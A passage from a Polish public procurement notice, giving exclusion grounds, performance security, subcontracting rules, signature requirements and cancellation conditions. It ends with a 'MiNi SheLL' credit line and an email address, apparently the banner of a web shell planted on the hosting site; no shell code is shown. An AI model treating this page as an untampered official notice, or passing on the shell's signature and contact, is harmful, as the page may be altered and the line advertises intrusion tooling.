ofert: <span class="normal">2024-01-08 08:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-02-06</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> W postępowaniu mogą brać udział W-wcy,którzy nie podlegają wykluczeniu z postępowania w okolicznościach,o których<br/>mowa w art. 108 ust. 1 PZP.<br/>W związku z tym, iż wartość zamówienia nie przekracza wyrażonej w złotych równowartości kwoty dla usług 10 000 000<br/>euro przesłanka wykluczenia, o której mowa w art. 108 ust. 2 PZP w niniejszym postępowaniu nie występuje.<br/>W postępowaniu mogą brać udział W-wcy,którzy nie podlegają wykluczeniu z postępowania w okolicznościach,o których<br/>mowa w art.7 pkt 1-3 ustawy z dnia 13.04.2022 r.o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu<br/>agresji na Ukrainę oraz służących bezpieczeństwu narodowego(Specustawa):<br/>1)na warunkach określonych w art.7 ust. 1 pkt 1 Specustawy<br/>2) na warunkach określonych w art.7 ust.1 pkt 2 Specustawy<br/>3) na warunkach określonych w art.7 ust.1 pkt 3 Specustawy<br/>Zamawiający nie przewiduje:<br/>-zwrotu kosztów udziału w postępowaniu<br/>-zawarcia umowy ramowej<br/>-rozliczeń z Wykonawcą w obcych walutach<br/>-wyboru najkorzystniejszej oferty z możliwością prowadzenia negocjacji<br/>-wymagań w zakresie zatrudnienia osób,o których mowa w art.96 ust.2 Pzp<br/>-złożenia oferty w postaci katalogów elektronicznych lub dołączenia katalogów elektronicznych do oferty<br/>-składania ofert częściowych<br/>Zamawiający wymaga wniesienia zabezpieczenia należytego wykonania umowy przez Wykonawcę, którego oferta została<br/>uznana za najkorzystniejszą.Zabezpieczenie należytego wykonania umowy wynosić będzie 2 % ceny łącznej wynikającej z<br/>wartości zamówienia. Zabezpieczenie może być wnoszone według wyboru Wykonawcy w jednej lub w kilku formach, o<br/>których mowa w pkt. 20.3 SWZ. Szczegółowe informacje w rozdziale nr 20 SWZ.<br/>Zamawiający nie zastrzega obowiązku osobistego wykonania przez Wykonawcę kluczowych zadań dotyczących przedmiotu<br/>zamówienia. Wykonawca może powierzyć realizację elementów (części) przedmiotu zamówienia podwykonawcom. W<br/>przypadku zamiaru wykonywania przedmiotu zamówienia z udziałem podwykonawców Wykonawca zobowiązany jest do<br/>wskazania w swojej ofercie części zamówienia (zakresów rzeczowych), których wykonanie zamierza powierzyć<br/>podwykonawcom, oraz podania nazw ewentualnych podwykonawców, jeżeli są już znani. Wskazanie takie należy umieścić<br/>na Ofercie. W przypadku braku wskazania w Ofercie podwykonawstwa Wykonawca będzie mógł wprowadzić<br/>podwykonawcę wyłącznie na warunkach określonych w umowie (załącznik nr 10 do SWZ).<br/>Pouczenie o środkach ochrony prawnej przysługujących Wykonawcy w toku postępowania o udzielenie zamówienia zawarte<br/>zostały w rozdziale nr 19 SWZ.<br/>Oferta musi być sporządzona pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej opatrzonej<br/>podpisem zaufanym lub podpisem osobistym.<br/>Terminy wykonania poszczególnych prac będą określane w Zleceniach sporządzanych przez Przedstawiciela<br/>Zamawiającego.<br/>Jeżeli zawarcie umowy nastąpi wcześniej, niż przed dniem 25.01.2024 r., rozpoczęcie realizacji zamówienia nastąpi od dnia 25.01.2024 r.<br/>Zamawiający unieważni postępowanie o udzielenie zamówienia, jeżeli zaistnieje jedna z przesłanek wskazanych w art. 255<br/>ustawy Pzp. Zamawiający przewiduje unieważnienie na podstawie art. 310 ustawy Pzp – w sytuacji jeżeli środki publiczne, które zamierzał przeznaczyć Zamawiający na sfinansowanie całości lub części<br/>zamówienia nie zostaną mu przyznane, a możliwość unieważnienia postępowania na tej podstawie została przewidziana w ogłoszeniu o zamówieniu – w postępowaniu prowadzonym w trybie podstawowym.<br/>Opis sposobu obliczenia ceny zawarty jest w rozdziale nr 15 SWZ.

Creat By MiNi SheLL
Email: jattceo@gmail.com